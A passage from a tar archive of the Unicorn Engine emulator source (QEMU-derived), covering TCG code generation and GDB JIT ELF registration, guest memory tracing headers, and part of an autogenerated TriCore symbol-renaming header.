moves if needed */ for(i = 0; i < nb_oargs; i++) { arg = op->args[i]; ts = arg_temp(arg); /* ENV should not be modified. */ tcg_debug_assert(!ts->fixed_reg); reg = tcg_target_call_oarg_regs[i]; tcg_debug_assert(s->reg_to_temp[reg] == NULL); if (ts->val_type == TEMP_VAL_REG) { s->reg_to_temp[ts->reg] = NULL; } ts->val_type = TEMP_VAL_REG; ts->reg = reg; ts->mem_coherent = 0; s->reg_to_temp[reg] = ts; if (NEED_SYNC_ARG(i)) { temp_sync(s, ts, allocated_regs, 0, IS_DEAD_ARG(i)); } else if (IS_DEAD_ARG(i)) { temp_dead(s, ts); } } } int64_t tcg_cpu_exec_time(void) { // error_report("%s: TCG profiler not compiled", __func__); exit(EXIT_FAILURE); } int tcg_gen_code(TCGContext *s, TranslationBlock *tb) { int i, num_insns; TCGOp *op; #ifndef NDEBUG if (is_log_level_active(CPU_LOG_TB_IN_ASM)) { tcg_dump_ops(s, false, "TCG before optimization:"); } #endif #ifdef CONFIG_DEBUG_TCG /* Ensure all labels referenced have been emitted. */ { TCGLabel *l; bool error = false; QSIMPLEQ_FOREACH(l, &s->labels, next) { if (unlikely(!l->present) && l->refs) { error = true; } } assert(!error); } #endif #ifdef USE_TCG_OPTIMIZATIONS tcg_optimize(s); #endif //tcg_dump_ops(s, false, "after opt1:"); reachable_code_pass(s); //tcg_dump_ops(s, false, "after opt2:"); liveness_pass_1(s); //tcg_dump_ops(s, false, "after opt3:"); if (s->nb_indirects > 0) { /* Replace indirect temps with direct temps. */ if (liveness_pass_2(s)) { /* If changes were made, re-run liveness. */ liveness_pass_1(s); } } //tcg_dump_ops(s, false, "after opt4:"); tcg_reg_alloc_start(s); s->code_buf = tb->tc.ptr; s->code_ptr = tb->tc.ptr; #ifdef TCG_TARGET_NEED_LDST_LABELS QSIMPLEQ_INIT(&s->ldst_labels); #endif #ifdef TCG_TARGET_NEED_POOL_LABELS s->pool_labels = NULL; #endif #ifndef NDEBUG if (is_log_level_active(CPU_LOG_TB_IN_ASM)) { tcg_dump_ops(s, false, "TCG before codegen:"); } #endif num_insns = -1; QTAILQ_FOREACH(op, &s->ops, link) { TCGOpcode opc = op->opc; switch (opc) { case INDEX_op_mov_i32: case INDEX_op_mov_i64: case INDEX_op_mov_vec: tcg_reg_alloc_mov(s, op); break; case INDEX_op_movi_i32: case INDEX_op_movi_i64: case INDEX_op_dupi_vec: tcg_reg_alloc_movi(s, op); break; case INDEX_op_dup_vec: tcg_reg_alloc_dup(s, op); break; case INDEX_op_insn_start: if (num_insns >= 0) { size_t off = tcg_current_code_size(s); s->gen_insn_end_off[num_insns] = off; /* Assert that we do not overflow our stored offset. */ assert(s->gen_insn_end_off[num_insns] == off); } num_insns++; for (i = 0; i < TARGET_INSN_START_WORDS; ++i) { target_ulong a; #if TARGET_LONG_BITS > TCG_TARGET_REG_BITS a = deposit64(op->args[i * 2], 32, 32, op->args[i * 2 + 1]); #else a = op->args[i]; #endif s->gen_insn_data[num_insns][i] = a; } break; case INDEX_op_discard: temp_dead(s, arg_temp(op->args[0])); break; case INDEX_op_set_label: tcg_reg_alloc_bb_end(s, s->reserved_regs); tcg_out_label(s, arg_label(op->args[0]), s->code_ptr); break; case INDEX_op_call: tcg_reg_alloc_call(s, op); break; default: /* Sanity check that we've not introduced any unhandled opcodes. */ tcg_debug_assert(tcg_op_supported(opc)); /* Note: in order to speed up the code, it would be much faster to have specialized register allocator functions for some common argument patterns */ tcg_reg_alloc_op(s, op); break; } #ifdef CONFIG_DEBUG_TCG check_regs(s); #endif /* Test for (pending) buffer overflow. The assumption is that any one operation beginning below the high water mark cannot overrun the buffer completely. Thus we can test for overflow after generating code without having to check during generation. */ if (unlikely((void *)s->code_ptr > s->code_gen_highwater)) { return -1; } /* Test for TB overflow, as seen by gen_insn_end_off. */ if (unlikely(tcg_current_code_size(s) > UINT16_MAX)) { return -2; } } tcg_debug_assert(num_insns >= 0); s->gen_insn_end_off[num_insns] = tcg_current_code_size(s); /* Generate TB finalization at the end of block */ #ifdef TCG_TARGET_NEED_LDST_LABELS i = tcg_out_ldst_finalize(s); if (i < 0) { return i; } #endif #ifdef TCG_TARGET_NEED_POOL_LABELS i = tcg_out_pool_finalize(s); if (i < 0) { return i; } #endif if (!tcg_resolve_relocs(s)) { return -2; } /* flush instruction cache */ flush_icache_range((uintptr_t)s->code_buf, (uintptr_t)s->code_ptr); return tcg_current_code_size(s); } #ifdef ELF_HOST_MACHINE /* In order to use this feature, the backend needs to do three things: (1) Define ELF_HOST_MACHINE to indicate both what value to put into the ELF image and to indicate support for the feature. (2) Define tcg_register_jit. This should create a buffer containing the contents of a .debug_frame section that describes the post- prologue unwind info for the tcg machine. (3) Call tcg_register_jit_int, with the constructed .debug_frame. */ /* Begin GDB interface. THE FOLLOWING MUST MATCH GDB DOCS. */ typedef enum { JIT_NOACTION = 0, JIT_REGISTER_FN, JIT_UNREGISTER_FN } jit_actions_t; struct jit_descriptor { uint32_t version; uint32_t action_flag; struct jit_code_entry *relevant_entry; struct jit_code_entry *first_entry; }; #if 0 void __jit_debug_register_code(void) QEMU_NOINLINE; void __jit_debug_register_code(void) { asm(""); } /* Must statically initialize the version, because GDB may check the version before we can set it. */ struct jit_descriptor __jit_debug_descriptor = { 1, 0, 0, 0 }; #endif /* End GDB interface. */ static int find_string(const char *strtab, const char *str) { const char *p = strtab + 1; while (1) { if (strcmp(p, str) == 0) { return p - strtab; } p += strlen(p) + 1; } } static void tcg_register_jit_int(TCGContext *s, void *buf_ptr, size_t buf_size, const void *debug_frame, size_t debug_frame_size) { struct __attribute__((packed)) DebugInfo { uint32_t len; uint16_t version; uint32_t abbrev; uint8_t ptr_size; uint8_t cu_die; uint16_t cu_lang; uintptr_t cu_low_pc; uintptr_t cu_high_pc; uint8_t fn_die; char fn_name[16]; uintptr_t fn_low_pc; uintptr_t fn_high_pc; uint8_t cu_eoc; }; struct ElfImage { ElfW(Ehdr) ehdr; ElfW(Phdr) phdr; ElfW(Shdr) shdr[7]; ElfW(Sym) sym[2]; struct DebugInfo di; uint8_t da[24]; char str[80]; }; struct ElfImage *img; static const struct ElfImage img_template = { .ehdr = { .e_ident[EI_MAG0] = ELFMAG0, .e_ident[EI_MAG1] = ELFMAG1, .e_ident[EI_MAG2] = ELFMAG2, .e_ident[EI_MAG3] = ELFMAG3, .e_ident[EI_CLASS] = ELF_CLASS, .e_ident[EI_DATA] = ELF_DATA, .e_ident[EI_VERSION] = EV_CURRENT, .e_type = ET_EXEC, .e_machine = ELF_HOST_MACHINE, .e_version = EV_CURRENT, .e_phoff = offsetof(struct ElfImage, phdr), .e_shoff = offsetof(struct ElfImage, shdr), .e_ehsize = sizeof(ElfW(Shdr)), .e_phentsize = sizeof(ElfW(Phdr)), .e_phnum = 1, .e_shentsize = sizeof(ElfW(Shdr)), .e_shnum = ARRAY_SIZE(img->shdr), .e_shstrndx = ARRAY_SIZE(img->shdr) - 1, #ifdef ELF_HOST_FLAGS .e_flags = ELF_HOST_FLAGS, #endif #ifdef ELF_OSABI .e_ident[EI_OSABI] = ELF_OSABI, #endif }, .phdr = { .p_type = PT_LOAD, .p_flags = PF_X, }, .shdr = { [0] = { .sh_type = SHT_NULL }, /* Trick: The contents of code_gen_buffer are not present in this fake ELF file; that got allocated elsewhere. Therefore we mark .text as SHT_NOBITS (similar to .bss) so that readers will not look for contents. We can record any address. */ [1] = { /* .text */ .sh_type = SHT_NOBITS, .sh_flags = SHF_EXECINSTR | SHF_ALLOC, }, [2] = { /* .debug_info */ .sh_type = SHT_PROGBITS, .sh_offset = offsetof(struct ElfImage, di), .sh_size = sizeof(struct DebugInfo), }, [3] = { /* .debug_abbrev */ .sh_type = SHT_PROGBITS, .sh_offset = offsetof(struct ElfImage, da), .sh_size = sizeof(img->da), }, [4] = { /* .debug_frame */ .sh_type = SHT_PROGBITS, .sh_offset = sizeof(struct ElfImage), }, [5] = { /* .symtab */ .sh_type = SHT_SYMTAB, .sh_offset = offsetof(struct ElfImage, sym), .sh_size = sizeof(img->sym), .sh_info = 1, .sh_link = ARRAY_SIZE(img->shdr) - 1, .sh_entsize = sizeof(ElfW(Sym)), }, [6] = { /* .strtab */ .sh_type = SHT_STRTAB, .sh_offset = offsetof(struct ElfImage, str), .sh_size = sizeof(img->str), } }, .sym = { [1] = { /* code_gen_buffer */ .st_info = ELF_ST_INFO(STB_GLOBAL, STT_FUNC), .st_shndx = 1, } }, .di = { .len = sizeof(struct DebugInfo) - 4, .version = 2, .ptr_size = sizeof(void *), .cu_die = 1, .cu_lang = 0x8001, /* DW_LANG_Mips_Assembler */ .fn_die = 2, .fn_name = "code_gen_buffer" }, .da = { 1, /* abbrev number (the cu) */ 0x11, 1, /* DW_TAG_compile_unit, has children */ 0x13, 0x5, /* DW_AT_language, DW_FORM_data2 */ 0x11, 0x1, /* DW_AT_low_pc, DW_FORM_addr */ 0x12, 0x1, /* DW_AT_high_pc, DW_FORM_addr */ 0, 0, /* end of abbrev */ 2, /* abbrev number (the fn) */ 0x2e, 0, /* DW_TAG_subprogram, no children */ 0x3, 0x8, /* DW_AT_name, DW_FORM_string */ 0x11, 0x1, /* DW_AT_low_pc, DW_FORM_addr */ 0x12, 0x1, /* DW_AT_high_pc, DW_FORM_addr */ 0, 0, /* end of abbrev */ 0 /* no more abbrev */ }, .str = "\0" ".text\0" ".debug_info\0" ".debug_abbrev\0" ".debug_frame\0" ".symtab\0" ".strtab\0" "code_gen_buffer", }; uintptr_t buf = (uintptr_t)buf_ptr; size_t img_size = sizeof(struct ElfImage) + debug_frame_size; DebugFrameHeader *dfh; img = g_malloc(img_size); *img = img_template; img->phdr.p_vaddr = buf; img->phdr.p_paddr = buf; img->phdr.p_memsz = buf_size; img->shdr[1].sh_name = find_string(img->str, ".text"); img->shdr[1].sh_addr = buf; img->shdr[1].sh_size = buf_size; img->shdr[2].sh_name = find_string(img->str, ".debug_info"); img->shdr[3].sh_name = find_string(img->str, ".debug_abbrev"); img->shdr[4].sh_name = find_string(img->str, ".debug_frame"); img->shdr[4].sh_size = debug_frame_size; img->shdr[5].sh_name = find_string(img->str, ".symtab"); img->shdr[6].sh_name = find_string(img->str, ".strtab"); img->sym[1].st_name = find_string(img->str, "code_gen_buffer"); img->sym[1].st_value = buf; img->sym[1].st_size = buf_size; img->di.cu_low_pc = buf; img->di.cu_high_pc = buf + buf_size; img->di.fn_low_pc = buf; img->di.fn_high_pc = buf + buf_size; dfh = (DebugFrameHeader *)(img + 1); memcpy(dfh, debug_frame, debug_frame_size); dfh->fde.func_start = buf; dfh->fde.func_len = buf_size; #ifdef DEBUG_JIT /* Enable this block to be able to debug the ELF image file creation. One can use readelf, objdump, or other inspection utilities. */ { FILE *f = fopen("/tmp/qemu.jit", "w+b"); if (f) { if (fwrite(img, img_size, 1, f) != img_size) { /* Avoid stupid unused return value warning for fwrite. */ } fclose(f); } } #endif s->one_entry->symfile_addr = img; s->one_entry->symfile_size = img_size; #if 0 __jit_debug_descriptor.action_flag = JIT_REGISTER_FN; __jit_debug_descriptor.relevant_entry = s->one_entry; __jit_debug_descriptor.first_entry = s->one_entry; __jit_debug_register_code(); #endif } #else /* No support for the feature. Provide the entry point expected by exec.c, and implement the internal function we declared earlier. */ static void tcg_register_jit_int(TCGContext *s, void *buf, size_t size, const void *debug_frame, size_t debug_frame_size) { } void tcg_register_jit(TCGContext *s, void *buf, size_t buf_size) { } #endif /* ELF_HOST_MACHINE */ #if !TCG_TARGET_MAYBE_vec void tcg_expand_vec_op(TCGContext *tcg_ctx, TCGOpcode o, TCGType t, unsigned e, TCGArg a0, ...) { g_assert_not_reached(); } #endif �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/trace/���������������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0015251�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/trace/mem-internal.h�������������������������������������������������������������0000664�0000000�0000000�00000002636�14675241067�0020021�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Helper functions for guest memory tracing * * Copyright (C) 2016 Lluís Vilanova <vilanova@ac.upc.edu> * * This work is licensed under the terms of the GNU GPL, version 2 or later. * See the COPYING file in the top-level directory. */ #ifndef TRACE__MEM_INTERNAL_H #define TRACE__MEM_INTERNAL_H #define TRACE_MEM_SZ_SHIFT_MASK 0xf /* size shift mask */ #define TRACE_MEM_SE (1ULL << 4) /* sign extended (y/n) */ #define TRACE_MEM_BE (1ULL << 5) /* big endian (y/n) */ #define TRACE_MEM_ST (1ULL << 6) /* store (y/n) */ #define TRACE_MEM_MMU_SHIFT 8 /* mmu idx */ static inline uint16_t trace_mem_build_info( int size_shift, bool sign_extend, MemOp endianness, bool store, unsigned int mmu_idx) { uint16_t res; res = size_shift & TRACE_MEM_SZ_SHIFT_MASK; if (sign_extend) { res |= TRACE_MEM_SE; } if (endianness == MO_BE) { res |= TRACE_MEM_BE; } if (store) { res |= TRACE_MEM_ST; } #ifdef CONFIG_SOFTMMU res |= mmu_idx << TRACE_MEM_MMU_SHIFT; #endif return res; } static inline uint16_t trace_mem_get_info(MemOp op, unsigned int mmu_idx, bool store) { return trace_mem_build_info(op & MO_SIZE, !!(op & MO_SIGN), op & MO_BSWAP, store, mmu_idx); } #endif /* TRACE__MEM_INTERNAL_H */ ��������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/trace/mem.h����������������������������������������������������������������������0000664�0000000�0000000�00000001537�14675241067�0016206�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Helper functions for guest memory tracing * * Copyright (C) 2016 Lluís Vilanova <vilanova@ac.upc.edu> * * This work is licensed under the terms of the GNU GPL, version 2 or later. * See the COPYING file in the top-level directory. */ #ifndef TRACE__MEM_H #define TRACE__MEM_H #include "tcg/tcg.h" /** * trace_mem_get_info: * * Return a value for the 'info' argument in guest memory access traces. */ static uint16_t trace_mem_get_info(MemOp op, unsigned int mmu_idx, bool store); /** * trace_mem_build_info: * * Return a value for the 'info' argument in guest memory access traces. */ static uint16_t trace_mem_build_info(int size_shift, bool sign_extend, MemOp endianness, bool store, unsigned int mmuidx); #include "mem-internal.h" #endif /* TRACE__MEM_H */ �����������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/tricore.h������������������������������������������������������������������������0000664�0000000�0000000�00000223556�14675241067�0016010�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Autogen header for Unicorn Engine - DONOT MODIFY */ #ifndef UNICORN_AUTOGEN_tricore_H #define UNICORN_AUTOGEN_tricore_H #ifndef UNICORN_ARCH_POSTFIX #define UNICORN_ARCH_POSTFIX _tricore #endif #define unicorn_fill_tlb unicorn_fill_tlb_tricore #define reg_read reg_read_tricore #define reg_write reg_write_tricore #define uc_init uc_init_tricore #define uc_add_inline_hook uc_add_inline_hook_tricore #define uc_del_inline_hook uc_del_inline_hook_tricore #define tb_invalidate_phys_range tb_invalidate_phys_range_tricore #define use_idiv_instructions use_idiv_instructions_tricore #define arm_arch arm_arch_tricore #define tb_target_set_jmp_target tb_target_set_jmp_target_tricore #define have_bmi1 have_bmi1_tricore #define have_popcnt have_popcnt_tricore #define have_avx1 have_avx1_tricore #define have_avx2 have_avx2_tricore #define have_isa have_isa_tricore #define have_altivec have_altivec_tricore #define have_vsx have_vsx_tricore #define flush_icache_range flush_icache_range_tricore #define s390_facilities s390_facilities_tricore #define tcg_dump_op tcg_dump_op_tricore #define tcg_dump_ops tcg_dump_ops_tricore #define tcg_gen_and_i64 tcg_gen_and_i64_tricore #define tcg_gen_discard_i64 tcg_gen_discard_i64_tricore #define tcg_gen_ld16s_i64 tcg_gen_ld16s_i64_tricore #define tcg_gen_ld16u_i64 tcg_gen_ld16u_i64_tricore #define tcg_gen_ld32s_i64 tcg_gen_ld32s_i64_tricore #define tcg_gen_ld32u_i64 tcg_gen_ld32u_i64_tricore #define tcg_gen_ld8s_i64 tcg_gen_ld8s_i64_tricore #define tcg_gen_ld8u_i64 tcg_gen_ld8u_i64_tricore #define tcg_gen_ld_i64 tcg_gen_ld_i64_tricore #define tcg_gen_mov_i64 tcg_gen_mov_i64_tricore #define tcg_gen_movi_i64 tcg_gen_movi_i64_tricore #define tcg_gen_mul_i64 tcg_gen_mul_i64_tricore #define tcg_gen_or_i64 tcg_gen_or_i64_tricore #define tcg_gen_sar_i64 tcg_gen_sar_i64_tricore #define tcg_gen_shl_i64 tcg_gen_shl_i64_tricore #define tcg_gen_shr_i64 tcg_gen_shr_i64_tricore #define tcg_gen_st_i64 tcg_gen_st_i64_tricore #define tcg_gen_xor_i64 tcg_gen_xor_i64_tricore #define cpu_icount_to_ns cpu_icount_to_ns_tricore #define cpu_is_stopped cpu_is_stopped_tricore #define cpu_get_ticks cpu_get_ticks_tricore #define cpu_get_clock cpu_get_clock_tricore #define cpu_resume cpu_resume_tricore #define qemu_init_vcpu qemu_init_vcpu_tricore #define cpu_stop_current cpu_stop_current_tricore #define resume_all_vcpus resume_all_vcpus_tricore #define vm_start vm_start_tricore #define address_space_dispatch_compact address_space_dispatch_compact_tricore #define flatview_translate flatview_translate_tricore #define address_space_translate_for_iotlb address_space_translate_for_iotlb_tricore #define qemu_get_cpu qemu_get_cpu_tricore #define cpu_address_space_init cpu_address_space_init_tricore #define cpu_get_address_space cpu_get_address_space_tricore #define cpu_exec_unrealizefn cpu_exec_unrealizefn_tricore #define cpu_exec_initfn cpu_exec_initfn_tricore #define cpu_exec_realizefn cpu_exec_realizefn_tricore #define tb_invalidate_phys_addr tb_invalidate_phys_addr_tricore #define cpu_watchpoint_insert cpu_watchpoint_insert_tricore #define cpu_watchpoint_remove_by_ref cpu_watchpoint_remove_by_ref_tricore #define cpu_watchpoint_remove_all cpu_watchpoint_remove_all_tricore #define cpu_watchpoint_address_matches cpu_watchpoint_address_matches_tricore #define cpu_breakpoint_insert cpu_breakpoint_insert_tricore #define cpu_breakpoint_remove cpu_breakpoint_remove_tricore #define cpu_breakpoint_remove_by_ref cpu_breakpoint_remove_by_ref_tricore #define cpu_breakpoint_remove_all cpu_breakpoint_remove_all_tricore #define cpu_abort cpu_abort_tricore #define cpu_physical_memory_test_and_clear_dirty cpu_physical_memory_test_and_clear_dirty_tricore #define memory_region_section_get_iotlb memory_region_section_get_iotlb_tricore #define flatview_add_to_dispatch flatview_add_to_dispatch_tricore #define qemu_ram_get_host_addr qemu_ram_get_host_addr_tricore #define qemu_ram_get_offset qemu_ram_get_offset_tricore #define qemu_ram_get_used_length qemu_ram_get_used_length_tricore #define qemu_ram_is_shared qemu_ram_is_shared_tricore #define qemu_ram_pagesize qemu_ram_pagesize_tricore #define qemu_ram_alloc_from_ptr qemu_ram_alloc_from_ptr_tricore #define qemu_ram_alloc qemu_ram_alloc_tricore #define qemu_ram_free qemu_ram_free_tricore #define qemu_map_ram_ptr qemu_map_ram_ptr_tricore #define qemu_ram_block_host_offset qemu_ram_block_host_offset_tricore #define qemu_ram_block_from_host qemu_ram_block_from_host_tricore #define qemu_ram_addr_from_host qemu_ram_addr_from_host_tricore #define cpu_check_watchpoint cpu_check_watchpoint_tricore #define iotlb_to_section iotlb_to_section_tricore #define address_space_dispatch_new address_space_dispatch_new_tricore #define address_space_dispatch_free address_space_dispatch_free_tricore #define flatview_read_continue flatview_read_continue_tricore #define address_space_read_full address_space_read_full_tricore #define address_space_write address_space_write_tricore #define address_space_rw address_space_rw_tricore #define cpu_physical_memory_rw cpu_physical_memory_rw_tricore #define address_space_write_rom address_space_write_rom_tricore #define cpu_flush_icache_range cpu_flush_icache_range_tricore #define cpu_exec_init_all cpu_exec_init_all_tricore #define address_space_access_valid address_space_access_valid_tricore #define address_space_map address_space_map_tricore #define address_space_unmap address_space_unmap_tricore #define cpu_physical_memory_map cpu_physical_memory_map_tricore #define cpu_physical_memory_unmap cpu_physical_memory_unmap_tricore #define cpu_memory_rw_debug cpu_memory_rw_debug_tricore #define qemu_target_page_size qemu_target_page_size_tricore #define qemu_target_page_bits qemu_target_page_bits_tricore #define qemu_target_page_bits_min qemu_target_page_bits_min_tricore #define target_words_bigendian target_words_bigendian_tricore #define cpu_physical_memory_is_io cpu_physical_memory_is_io_tricore #define ram_block_discard_range ram_block_discard_range_tricore #define ramblock_is_pmem ramblock_is_pmem_tricore #define page_size_init page_size_init_tricore #define set_preferred_target_page_bits set_preferred_target_page_bits_tricore #define finalize_target_page_bits finalize_target_page_bits_tricore #define cpu_outb cpu_outb_tricore #define cpu_outw cpu_outw_tricore #define cpu_outl cpu_outl_tricore #define cpu_inb cpu_inb_tricore #define cpu_inw cpu_inw_tricore #define cpu_inl cpu_inl_tricore #define memory_map memory_map_tricore #define memory_map_io memory_map_io_tricore #define memory_map_ptr memory_map_ptr_tricore #define memory_cow memory_cow_tricore #define memory_unmap memory_unmap_tricore #define memory_moveout memory_moveout_tricore #define memory_movein memory_movein_tricore #define memory_free memory_free_tricore #define flatview_unref flatview_unref_tricore #define address_space_get_flatview address_space_get_flatview_tricore #define memory_region_transaction_begin memory_region_transaction_begin_tricore #define memory_region_transaction_commit memory_region_transaction_commit_tricore #define memory_region_init memory_region_init_tricore #define memory_region_access_valid memory_region_access_valid_tricore #define memory_region_dispatch_read memory_region_dispatch_read_tricore #define memory_region_dispatch_write memory_region_dispatch_write_tricore #define memory_region_init_io memory_region_init_io_tricore #define memory_region_init_ram_ptr memory_region_init_ram_ptr_tricore #define memory_region_size memory_region_size_tricore #define memory_region_set_readonly memory_region_set_readonly_tricore #define memory_region_get_ram_ptr memory_region_get_ram_ptr_tricore #define memory_region_from_host memory_region_from_host_tricore #define memory_region_get_ram_addr memory_region_get_ram_addr_tricore #define memory_region_add_subregion memory_region_add_subregion_tricore #define memory_region_del_subregion memory_region_del_subregion_tricore #define memory_region_add_subregion_overlap memory_region_add_subregion_overlap_tricore #define memory_region_find memory_region_find_tricore #define memory_region_filter_subregions memory_region_filter_subregions_tricore #define memory_listener_register memory_listener_register_tricore #define memory_listener_unregister memory_listener_unregister_tricore #define address_space_remove_listeners address_space_remove_listeners_tricore #define address_space_init address_space_init_tricore #define address_space_destroy address_space_destroy_tricore #define memory_region_init_ram memory_region_init_ram_tricore #define memory_mapping_list_add_merge_sorted memory_mapping_list_add_merge_sorted_tricore #define find_memory_mapping find_memory_mapping_tricore #define exec_inline_op exec_inline_op_tricore #define floatx80_default_nan floatx80_default_nan_tricore #define float_raise float_raise_tricore #define float16_is_quiet_nan float16_is_quiet_nan_tricore #define float16_is_signaling_nan float16_is_signaling_nan_tricore #define float32_is_quiet_nan float32_is_quiet_nan_tricore #define float32_is_signaling_nan float32_is_signaling_nan_tricore #define float64_is_quiet_nan float64_is_quiet_nan_tricore #define float64_is_signaling_nan float64_is_signaling_nan_tricore #define floatx80_is_quiet_nan floatx80_is_quiet_nan_tricore #define floatx80_is_signaling_nan floatx80_is_signaling_nan_tricore #define floatx80_silence_nan floatx80_silence_nan_tricore #define propagateFloatx80NaN propagateFloatx80NaN_tricore #define float128_is_quiet_nan float128_is_quiet_nan_tricore #define float128_is_signaling_nan float128_is_signaling_nan_tricore #define float128_silence_nan float128_silence_nan_tricore #define float16_add float16_add_tricore #define float16_sub float16_sub_tricore #define float32_add float32_add_tricore #define float32_sub float32_sub_tricore #define float64_add float64_add_tricore #define float64_sub float64_sub_tricore #define float16_mul float16_mul_tricore #define float32_mul float32_mul_tricore #define float64_mul float64_mul_tricore #define float16_muladd float16_muladd_tricore #define float32_muladd float32_muladd_tricore #define float64_muladd float64_muladd_tricore #define float16_div float16_div_tricore #define float32_div float32_div_tricore #define float64_div float64_div_tricore #define float16_to_float32 float16_to_float32_tricore #define float16_to_float64 float16_to_float64_tricore #define float32_to_float16 float32_to_float16_tricore #define float32_to_float64 float32_to_float64_tricore #define float64_to_float16 float64_to_float16_tricore #define float64_to_float32 float64_to_float32_tricore #define float16_round_to_int float16_round_to_int_tricore #define float32_round_to_int float32_round_to_int_tricore #define float64_round_to_int float64_round_to_int_tricore #define float16_to_int16_scalbn float16_to_int16_scalbn_tricore #define float16_to_int32_scalbn float16_to_int32_scalbn_tricore #define float16_to_int64_scalbn float16_to_int64_scalbn_tricore #define float32_to_int16_scalbn float32_to_int16_scalbn_tricore #define float32_to_int32_scalbn float32_to_int32_scalbn_tricore #define float32_to_int64_scalbn float32_to_int64_scalbn_tricore #define float64_to_int16_scalbn float64_to_int16_scalbn_tricore #define float64_to_int32_scalbn float64_to_int32_scalbn_tricore #define float64_to_int64_scalbn float64_to_int64_scalbn_tricore #define float16_to_int16 float16_to_int16_tricore #define float16_to_int32 float16_to_int32_tricore #define float16_to_int64 float16_to_int64_tricore #define float32_to_int16 float32_to_int16_tricore #define float32_to_int32 float32_to_int32_tricore #define float32_to_int64 float32_to_int64_tricore #define float64_to_int16 float64_to_int16_tricore #define float64_to_int32 float64_to_int32_tricore #define float64_to_int64 float64_to_int64_tricore #define float16_to_int16_round_to_zero float16_to_int16_round_to_zero_tricore #define float16_to_int32_round_to_zero float16_to_int32_round_to_zero_tricore #define float16_to_int64_round_to_zero float16_to_int64_round_to_zero_tricore #define float32_to_int16_round_to_zero float32_to_int16_round_to_zero_tricore #define float32_to_int32_round_to_zero float32_to_int32_round_to_zero_tricore #define float32_to_int64_round_to_zero float32_to_int64_round_to_zero_tricore #define float64_to_int16_round_to_zero float64_to_int16_round_to_zero_tricore #define float64_to_int32_round_to_zero float64_to_int32_round_to_zero_tricore #define float64_to_int64_round_to_zero float64_to_int64_round_to_zero_tricore #define float16_to_uint16_scalbn float16_to_uint16_scalbn_tricore #define float16_to_uint32_scalbn float16_to_uint32_scalbn_tricore #define float16_to_uint64_scalbn float16_to_uint64_scalbn_tricore #define float32_to_uint16_scalbn float32_to_uint16_scalbn_tricore #define float32_to_uint32_scalbn float32_to_uint32_scalbn_tricore #define float32_to_uint64_scalbn float32_to_uint64_scalbn_tricore #define float64_to_uint16_scalbn float64_to_uint16_scalbn_tricore #define float64_to_uint32_scalbn float64_to_uint32_scalbn_tricore #define float64_to_uint64_scalbn float64_to_uint64_scalbn_tricore #define float16_to_uint16 float16_to_uint16_tricore #define float16_to_uint32 float16_to_uint32_tricore #define float16_to_uint64 float16_to_uint64_tricore #define float32_to_uint16 float32_to_uint16_tricore #define float32_to_uint32 float32_to_uint32_tricore #define float32_to_uint64 float32_to_uint64_tricore #define float64_to_uint16 float64_to_uint16_tricore #define float64_to_uint32 float64_to_uint32_tricore #define float64_to_uint64 float64_to_uint64_tricore #define float16_to_uint16_round_to_zero float16_to_uint16_round_to_zero_tricore #define float16_to_uint32_round_to_zero float16_to_uint32_round_to_zero_tricore #define float16_to_uint64_round_to_zero float16_to_uint64_round_to_zero_tricore #define float32_to_uint16_round_to_zero float32_to_uint16_round_to_zero_tricore #define float32_to_uint32_round_to_zero float32_to_uint32_round_to_zero_tricore #define float32_to_uint64_round_to_zero float32_to_uint64_round_to_zero_tricore #define float64_to_uint16_round_to_zero float64_to_uint16_round_to_zero_tricore #define float64_to_uint32_round_to_zero float64_to_uint32_round_to_zero_tricore #define float64_to_uint64_round_to_zero float64_to_uint64_round_to_zero_tricore #define int64_to_float16_scalbn int64_to_float16_scalbn_tricore #define int32_to_float16_scalbn int32_to_float16_scalbn_tricore #define int16_to_float16_scalbn int16_to_float16_scalbn_tricore #define int64_to_float16 int64_to_float16_tricore #define int32_to_float16 int32_to_float16_tricore #define int16_to_float16 int16_to_float16_tricore #define int64_to_float32_scalbn int64_to_float32_scalbn_tricore #define int32_to_float32_scalbn int32_to_float32_scalbn_tricore #define int16_to_float32_scalbn int16_to_float32_scalbn_tricore #define int64_to_float32 int64_to_float32_tricore #define int32_to_float32 int32_to_float32_tricore #define int16_to_float32 int16_to_float32_tricore #define int64_to_float64_scalbn int64_to_float64_scalbn_tricore #define int32_to_float64_scalbn int32_to_float64_scalbn_tricore #define int16_to_float64_scalbn int16_to_float64_scalbn_tricore #define int64_to_float64 int64_to_float64_tricore #define int32_to_float64 int32_to_float64_tricore #define int16_to_float64 int16_to_float64_tricore #define uint64_to_float16_scalbn uint64_to_float16_scalbn_tricore #define uint32_to_float16_scalbn uint32_to_float16_scalbn_tricore #define uint16_to_float16_scalbn uint16_to_float16_scalbn_tricore #define uint64_to_float16 uint64_to_float16_tricore #define uint32_to_float16 uint32_to_float16_tricore #define uint16_to_float16 uint16_to_float16_tricore #define uint64_to_float32_scalbn uint64_to_float32_scalbn_tricore #define uint32_to_float32_scalbn uint32_to_float32_scalbn_tricore #define uint16_to_float32_scalbn uint16_to_float32_scalbn_tricore #define uint64_to_float32 uint64_to_float32_tricore #define uint32_to_float32 uint32_to_float32_tricore #define uint16_to_float32 uint16_to_float32_tricore #define uint64_to_float64_scalbn uint64_to_float64_scalbn_tricore #define uint32_to_float64_scalbn uint32_to_float64_scalbn_tricore #define uint16_to_float64_scalbn uint16_to_float64_scalbn_tricore #define uint64_to_float64 uint64_to_float64_tricore #define uint32_to_float64 uint32_to_float64_tricore #define uint16_to_float64 uint16_to_float64_tricore #define float16_min float16_min_tricore #define float16_minnum float16_minnum_tricore #define float16_minnummag float16_minnummag_tricore #define float16_max float16_max_tricore #define float16_maxnum float16_maxnum_tricore #define float16_maxnummag float16_maxnummag_tricore #define float32_min float32_min_tricore #define float32_minnum float32_minnum_tricore #define float32_minnummag float32_minnummag_tricore 